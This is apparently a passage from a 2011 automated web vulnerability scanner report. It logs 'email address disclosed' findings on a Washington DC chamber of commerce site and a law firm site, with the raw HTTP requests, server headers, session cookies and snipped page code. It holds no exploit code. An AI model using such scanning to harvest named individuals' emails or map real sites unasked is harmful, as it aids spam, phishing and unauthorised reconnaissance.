<!DOCTYPE HTML PUBLIC "-/ ...[SNIP]... </div>eeliasoph@cov.com
The following email address was disclosed in the response:
info@dcchamber.org
Request
GET /chamber/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="mailto:info@dcchamber.org"> ...[SNIP]... <a href="mailto:info@dcchamber.org">info@dcchamber.org</a> ...[SNIP]...
/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net) * Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) * and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses. * Thanks to: ...[SNIP]...
The following email address was disclosed in the response:
rreif@ebglaw.com
Request
GET /showoffice.aspx?Show=542 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href="mailto:rreif@ebglaw.com">rreif@ebglaw.com</a> ...[SNIP]...
/* Prototype JavaScript framework, version 1.5.0_rc1 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see ...[SNIP]...
// this is where we write out the VBScript for MSIE Windows var WM_startTagFix = '</'; var msie_windows = 0; if ((navigator.userAgent.indexOf('MSIE') != -1) ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>